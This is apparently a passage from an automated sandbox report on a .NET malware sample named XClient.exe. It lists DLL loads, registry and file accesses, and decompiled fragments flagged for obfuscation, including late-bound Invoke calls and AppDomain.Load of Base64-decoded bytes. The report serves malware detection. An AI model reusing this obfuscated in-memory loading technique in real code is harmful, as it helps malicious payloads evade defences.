              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeFile opened: C:\Windows\SYSTEM32\msftedit.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: XClient.exe.0.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.Wr6q5bLs7DHxrEdofIk9tA9iWzb5ofuBZPEYZ,WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.pM4QEnBnBVISDTk2dijym9ux34gbaBAr0vf9P,WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.AHb26KVUTlUGlLGlEb92na5ZNirEU3BtyyUwm,WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.yXLnX0iaasTS9FyCIAqHnRBhDmNTyGz9ZvNSS,cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.BDLdIEcYlEzgbiyZ4d1LeUOqQXRluUZtthkvo9eDTRiFVmOFbuVxx26ozhPe0LMrmbTGvMI6()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: XClient.exe.0.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{ZAeVAzy870sHQ1LF8XzIHJbNLv1p5YsTh40ig5ptzmalUvpWjhWDGNm[2],cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm._6dx4BHW1HHZSHLW09YKmb2bJzE19SROvP6o68AvHletDQD4vzb1AYX1V7VD5X1rf1BV83xgg(Convert.FromBase64String(ZAeVAzy870sHQ1LF8XzIHJbNLv1p5YsTh40ig5ptzmalUvpWjhWDGNm[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: test.3.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.Wr6q5bLs7DHxrEdofIk9tA9iWzb5ofuBZPEYZ,WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.pM4QEnBnBVISDTk2dijym9ux34gbaBAr0vf9P,WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.AHb26KVUTlUGlLGlEb92na5ZNirEU3BtyyUwm,WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.yXLnX0iaasTS9FyCIAqHnRBhDmNTyGz9ZvNSS,cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.BDLdIEcYlEzgbiyZ4d1LeUOqQXRluUZtthkvo9eDTRiFVmOFbuVxx26ozhPe0LMrmbTGvMI6()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: test.3.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{ZAeVAzy870sHQ1LF8XzIHJbNLv1p5YsTh40ig5ptzmalUvpWjhWDGNm[2],cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm._6dx4BHW1HHZSHLW09YKmb2bJzE19SROvP6o68AvHletDQD4vzb1AYX1V7VD5X1rf1BV83xgg(Convert.FromBase64String(ZAeVAzy870sHQ1LF8XzIHJbNLv1p5YsTh40ig5ptzmalUvpWjhWDGNm[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: XClient.exe.0.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs.Net Code: z3tuRhuzsGsxQPd9lSMpvNqzmf9eOT11tQapDWOuvLl4XbWKRzHsXDRZCQLBPvoZch5Tb System.AppDomain.Load(byte[])
              Source: XClient.exe.0.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs.Net Code: LAC1oLcwdALwfVqOOy1Riu9iJRtRZbMnqdz3QKzdhKx5iqtfh9Ljxzu System.AppDomain.Load(byte[])
              Source: XClient.exe.0.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs.Net Code: LAC1oLcwdALwfVqOOy1Riu9iJRtRZbMnqdz3QKzdhKx5iqtfh9Ljxzu
              Source: test.3.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs.Net Code: z3tuRhuzsGsxQPd9lSMpvNqzmf9eOT11tQapDWOuvLl4XbWKRzHsXDRZCQLBPvoZch5Tb System.AppDomain.Load(byte[])
              Source: test.3.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs.Net Code: LAC1oLcwdALwfVqOOy1Riu9iJRtRZbMnqdz3QKzdhKx5iqtfh9Ljxzu System.AppDomain.Load(byte[])
              Source: test.3.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs.Net Code: LAC1oLcwdALwfVqOOy1Riu9iJRtRZbMnqdz3QKzdhKx5iqtfh9Ljxzu
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04E36338 pushad ; ret 1_2_04E36341
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04E36F1C pushad ; ret 1_2_04E36F23
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 3_2_00007FFC3DD900BD pushad ; iretd 3_2_00007FFC3DD900C1
              Source: XClient.exe.0.dr, hTUHBEHQmRfs86X.csHigh entropy of concatenated method names: 'eT7CSgtYMfkNrDd', 'hmhe5vdmI6aGya2', 'aZEdtMsjRprkBNk', 'x6MisZ12pbC3L49iCdlvqTxtzdmdcpzg', '_4oJtvFjmGun6hcRHlex8QCuIO95v2UZC', '_08u3aADlCmi2cn239yvoG019oNjYEVcA', 'nQCAbY2PPXsjZkKYjffvZqreCVNfWMph', '_4h5tXRdOiXMMhrWQaLAOpn7y8vQ3NEtc', '_4uMtgtYBPYJjShLm7mqCUiTIOceXpHJU', 'jF2IOqEIIJ9lJXdSJqcfPsksrhK4rLov'
              Source: XClient.exe.0.dr, gEI2RJZt7QvOAzrcBB7lnj6964hB0MzCMqosR.csHigh entropy of concatenated method names: 'rAiPVUEzwJO8T0PdfEy7xjKeKFqKwbpfOLXG7', 'RPlEPFY1IfL9dB2VcIO33KMQSdZZLUrewmoKI', 'bS29nu81ncjbmPDHED7GIWRqg6Nl5meA7YLFK', 'RpktvTY5MCiw1ZNA1rKXNhjFt3MB2jOxxe7YR', 'yn3jH0xs8s3RjX1Pk7hJ1k9NqbO3N8eZwL1il', '_5Uay6ZZQ96ResnI4fJSC0PRlla4V4O3NrlJfv', 'Vlq4VrmWhMUwHJFKadstMsMMwwAS4OPtiPGx9', 'Wx6p5cUGaRJKJB5m8SaDpbDoWqNiTQNvfSt4d', 'hFVEcc0RgyRsN6SatfmSpi1h46A2MSsV9f6s4', 'GZLn6m7D3kSoodNxWv4nQwmIf6Xu04Li4Q94D36TRjQu9BjRR8x7mUSMOfcWLHywxVnKg'
              Source: XClient.exe.0.dr, Pu2RYie7ItoFfHNwGY7nJEx0mZZWuK3Zyc8Cip1H57hq3TT0KC0ct7ahNbYgcfnHKTIUeOse5zM0aYl61EkDHkj.csHigh entropy of concatenated method names: 'HjmXesd6pwDBG5pnSmFdZ6Hbgaf7WCZ2uvypLPM1YaI481J6S46W2XG58rBPBrLkjlz44F7JucUepT8pW6hGzUi', 'usQBCfSDiAGh9Ke9xb0u6MTWibvhvIz28raR0kO5b05sns2tDZL13Bcd61MlqFBZEXzeLko5PQtAYCKzEa0EH4Z', 'QjJYAUJx9SpkkXLtrM807qgovROyvUZAQ9GaAfdFcScQOMRIo2moneh032iOZyOWRLIbg7atyjJ5Vt2Cx52NNNB', 'hWL7LPFZnDmCnKs4jtdUhEXKS6vo0IEqP66cGLrRrZFjAC5YgRndvpvGVEP1NjAfl0hKwk1qYmsi5W0XzoPW3Qk', 'gBHGT5Gpc2I6Uw0Kybe58EJbRBgaW7nmjyfrYHnZGaRROdg', 'Bjz9IBfuyMoLq2M11DyUcqi92xjy5k1YWp7i2NgpLpuWZvw', 'q0Y6JaWCVEAETJUqbvvBrSkjjF15xvyZoZCRhwVkxU5dhmd', 'xcWbaTQrlI1HVz8Cnc4x5B74yl2TRgm5jGr2YgSn25YFIev', 'PdyMeTGCtzfGwNvJL6BFoBbmicw99jdhg1CgDThd0skee2k', 'LnXkbCLmudgPKEGJih65KT2yqZ2ruPIRr91HlLogDwSuSWC'
              Source: XClient.exe.0.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.csHigh entropy of concatenated method names: 'N63qDT29evOtRxAgGebUumTfKZYIg3bs5LMkyUJ3XDsPlbhe7PjAtxnMZVjYzIPzsxDHR', 'z3tuRhuzsGsxQPd9lSMpvNqzmf9eOT11tQapDWOuvLl4XbWKRzHsXDRZCQLBPvoZch5Tb', 'bPdAiaQG7XZLrK1qZxI55S0mHyN7Jl5yHpaIoqTrLncZPpVx4pPGDVkeYB4hY6eD3lHzT', 'Wm5DGTxuGPLAc7hXlxdiXCYOGRhbGDiZGNtoQlGCeGMLgiCnRLOai9TGhbC6GxPDxkysU', 'pARUIDgQFtsdy7Bd5rMWSBg7pk3lgbQv9fHzewulxk9FX228t3dUc5gu0cS7zkYLguOkJ', 'vXtwdxl0ursQb97NsSt0qDTucOPQ3s21KcyuhY2EswRj6SaBYUXPRVpYgPSUOGrFGhx6H', 'OVLfpKCG9BnjSeiFZHpEiGc0orPyVStCe22chCWbdcveBuFWXs3D1nv0gTLT1Sti8KhrR', '_5LvvLySjBoGaHErFgiQmLpbmHdIm65GbpvP9v5AnEMoiOt2s3y3ReIzQuGUjb5smGaFf0', 'wkbUm3CjkkdjvuPo60KA1VF5cpGAbX8SOUFZqLUcaDGCpN6kJ7EP8Yw', 'Z8sDz7heEJ0sxvAVRqxVcsDyweAf5nMqbLjdOelOEv3sQMZeIqwwaH5'
              Source: XClient.exe.0.dr, cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.csHigh entropy of concatenated method names: '_6avM53x2QohqoJhS7wBZ1CSbYvNTmCFV0G9TcIFqd2S9FBChcgJHx0czopFJsgOm09xO5uU1', 'c8CqnjF9qWD61lP2ipzb4Sm181oM80V7KZTBQ0y6qXaDkfmyEdJCbPlOypIM1gmN8II7X9E6', 'plZt2yx37I3HDMObL1fbpCzWTjfgVw51V0MkEMUKuubg7of4K5NlyzBQuNlaCJkGXeNyz4bR', 'eFpB8V10PIjkdZqZpQQlFYyWgEREpQLOGwn3RFEQK0u1XNDB1tB09oYOdkxUHFZ95dPYSrGY', 'KsNXLC8P2LwRBn1WHJ8TCQcKVPXMRMRe36SBCTxxItyGIFEW4MlajC64JSU8MZhhl5MEjQ9I', 'ISZ5bT0HFFdRP1DN19zxcgHV2P4EOPdcNhEn9PuBxnVymF2Qa986dSWdzEBhTzkk056PyCHB', 'PW9bRjhBeokYl6yz9Kk2SslUdXTseVoD7Vxe4hvkkedAVdjOpYBfd1rzOa5x5JGJPJK7Umzj', 'D6jwhLRyRyuQE2kdHOLAaG3JAKB1zQ428yyY92OHHaPvBnwOagycvjdaHFWXIFHMBH1KHQ0C', 'vc5eaqbULMrxriBeLuoTVUFeHgpqjuyUIaXdozP3HbzaXNvFIc3Kv5QOvrcCBnDD8Q9yuZKC', 'fi9xL1d5NcWF1GQwmIQGbvvDjY6O2CymMOTTmKPfi70KI6CSXuezd1ZaOU1C2uvsxGZ2WdWA'
              Source: XClient.exe.0.dr, baAfO6eh57uwRmfnb9ZgPW9GNd4C97yj82jLx.csHigh entropy of concatenated method names: 'FBNWljJUfRUOQHV8w5kXnivtFfvihr87V8fij', 'N3N7JwtMFIURW87Zd2HVZbIbG2Q4tHwh7ikej', 'B1UsqK3BpYtoo55elNJEb53GS0C4BTaQIZ5tg', 'C3gBLcFNJkCIB1aPhj8TVcFd5wa1qnkOytGkR', 'BAGercQozNU5ll1', 'pRsXO6M11LhQJ3Z', 'Nq9kdMsCokUEqhC', 'd1u9xj5WdnTP5q4', 'ZbkiMGaXA1UyJwz', 'Q6h2sNWLeb5UmQd'
              Source: XClient.exe.0.dr, g1kPeRidOFWh0Mq0MDiiGrVS0VQoWjR9LoOiyyxhvEYhDnS1Y9nkoDD.csHigh entropy of concatenated method names: 'VnAbJoODtKisVBy9SiAIENlKxEhUXgX5exiB0QuqHxt3MeL1rBy2ZHl', 'hJNjb4ACG8m4LfFcFRQjlBemGYSGdLPOEu7AYsUVsI7TepYX5Tkm4Ni', 'frdyR57Y6gjgHH6VYoE4cGWT18oMjkhMpPM7cmtLYYrpt7wbAjPlIBQ', 'F5xEhnU7hl63oMlEZHMcn6Z4CMCSXdu1JkErNy5VoL1c5MmezBZcNTd', 'knQWD1iJeZD4eh2UfLwfytZY6rKYONhSvAjwI1VBf1TTI8xso3fziEu', 'rlVmKVaYfaOVfbWEp6E4ycLl1rYNf1bPNFqIkwFcXFmjurhdWDVS6im', 'Zg7qxS2XBZEHkisBbnADmlyURQPPxnIoCknLJAvG6qTarGhqaBU6FvS', '_7FjPXkphe9XxFusoxlK3MnQKjdzdH35wPynMUWyVOZpzWXnDcZJ6GPj', 'oaqFOrYjheWUMIioTDwW7rlNwzqvkjyLfRtEhry6VtTmB6xuu4DnUlH', 'mTgs5zCxmvC3ex4IJ6KG98hIFiEmIrZ0ORzsxAt6gxuObw7gQGiQSDX'
              Source: XClient.exe.0.dr, xuigMhegpDWb7LyFrukanLGTDbKK1mTJMDADPB9Vz5qijEgBZbzo72QwF7mNBkuarMQ9LipLOQXs5xBkPhs96tO.csHigh entropy of concatenated method names: 'fk5LEgK7V2M3Hd149MjNFpfBZMY7yDzfMnatgVqrXr4zOIYIMEuPC2meTY0zUtUnnhnWwc2PlydoWivaE2lUSNV', 'QdgYZBpeJQLNoNPSSSpUt0LD2lSaP3SuPdDmPNzFBNaIb5s', 'aPs5pNPwlUAmCT43hITfLsEFpH21qsblBeCsZhyHWyhyOzY', 'ZqNDMvGPRADzq7RjcJkjZlJ34C3ar2ptOVzBZgPJC7276VL', 'iFkpACBewAllh3bnBTSG0AtnPyVKhvaNVXyFYyIyFdqy923'
              Source: test.3.dr, hTUHBEHQmRfs86X.csHigh entropy of concatenated method names: 'eT7CSgtYMfkNrDd', 'hmhe5vdmI6aGya2', 'aZEdtMsjRprkBNk', 'x6MisZ12pbC3L49iCdlvqTxtzdmdcpzg', '_4oJtvFjmGun6hcRHlex8QCuIO95v2UZC', '_08u3aADlCmi2cn239yvoG019oNjYEVcA', 'nQCAbY2PPXsjZkKYjffvZqreCVNfWMph', '_4h5tXRdOiXMMhrWQaLAOpn7y8vQ3NEtc', '_4uMtgtYBPYJjShLm7mqCUiTIOceXpHJU', 'jF2IOqEIIJ9lJXdSJqcfPsksrhK4rLov'
              Source: test.3.dr, gEI2RJZt7QvOAzrcBB7lnj6964hB0MzCMqosR.csHigh entropy of concatenated method names: 'rAiPVUEzwJO8T0PdfEy7xjKeKFqKwbpfOLXG7', 'RPlEPFY1IfL9dB2VcIO33KMQSdZZLUrewmoKI', 'bS29nu81ncjbmPDHED7GIWRqg6Nl5meA7YLFK', 'RpktvTY5MCiw1ZNA1rKXNhjFt3MB2jOxxe7YR', 'yn3jH0xs8s3RjX1Pk7hJ1k9NqbO3N8eZwL1il', '_5Uay6ZZQ96ResnI4fJSC0PRlla4V4O3NrlJfv', 'Vlq4VrmWhMUwHJFKadstMsMMwwAS4OPtiPGx9', 'Wx6p5cUGaRJKJB5m8SaDpbDoWqNiTQNvfSt4d', 'hFVEcc0RgyRsN6SatfmSpi1h46A2MSsV9f6s4', 'GZLn6m7D3kSoodNxWv4nQwmIf6Xu04Li4Q94D36TRjQu9BjRR8x7mUSMOfcWLHywxVnKg'
              Source: test.3.dr, Pu2RYie7ItoFfHNwGY7nJEx0mZZWuK3Zyc8Cip1H57hq3TT0KC0ct7ahNbYgcfnHKTIUeOse5zM0aYl61EkDHkj.csHigh entropy of concatenated method names: 'HjmXesd6pwDBG5pnSmFdZ6Hbgaf7WCZ2uvypLPM1YaI481J6S46W2XG58rBPBrLkjlz44F7JucUepT8pW6hGzUi', 'usQBCfSDiAGh9Ke9xb0u6MTWibvhvIz28raR0kO5b05sns2tDZL13Bcd61MlqFBZEXzeLko5PQtAYCKzEa0EH4Z', 'QjJYAUJx9SpkkXLtrM807qgovROyvUZAQ9GaAfdFcScQOMRIo2moneh032iOZyOWRLIbg7atyjJ5Vt2Cx52NNNB', 'hWL7LPFZnDmCnKs4jtdUhEXKS6vo0IEqP66cGLrRrZFjAC5YgRndvpvGVEP1NjAfl0hKwk1qYmsi5W0XzoPW3Qk', 'gBHGT5Gpc2I6Uw0Kybe58EJbRBgaW7nmjyfrYHnZGaRROdg', 'Bjz9IBfuyMoLq2M11DyUcqi92xjy5k1YWp7i2NgpLpuWZvw', 'q0Y6JaWCVEAETJUqbvvBrSkjjF15xvyZoZCRhwVkxU5dhmd', 'xcWbaTQrlI1HVz8Cnc4x5B74yl2TRgm5jGr2YgSn25YFIev', 'PdyMeTGCtzfGwNvJL6BFoBbmicw99jdhg1CgDThd0skee2k', 'LnXkbCLmudgPKEGJih65KT2yqZ2ruPIRr91HlLogDwSuSWC'
